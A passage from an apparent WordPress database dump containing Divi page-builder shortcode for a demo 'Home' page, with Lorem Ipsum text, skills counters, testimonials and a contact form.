button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 21:46:09','2020-07-04 21:46:09','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(178,1,'2020-07-04 21:47:52','2020-07-04 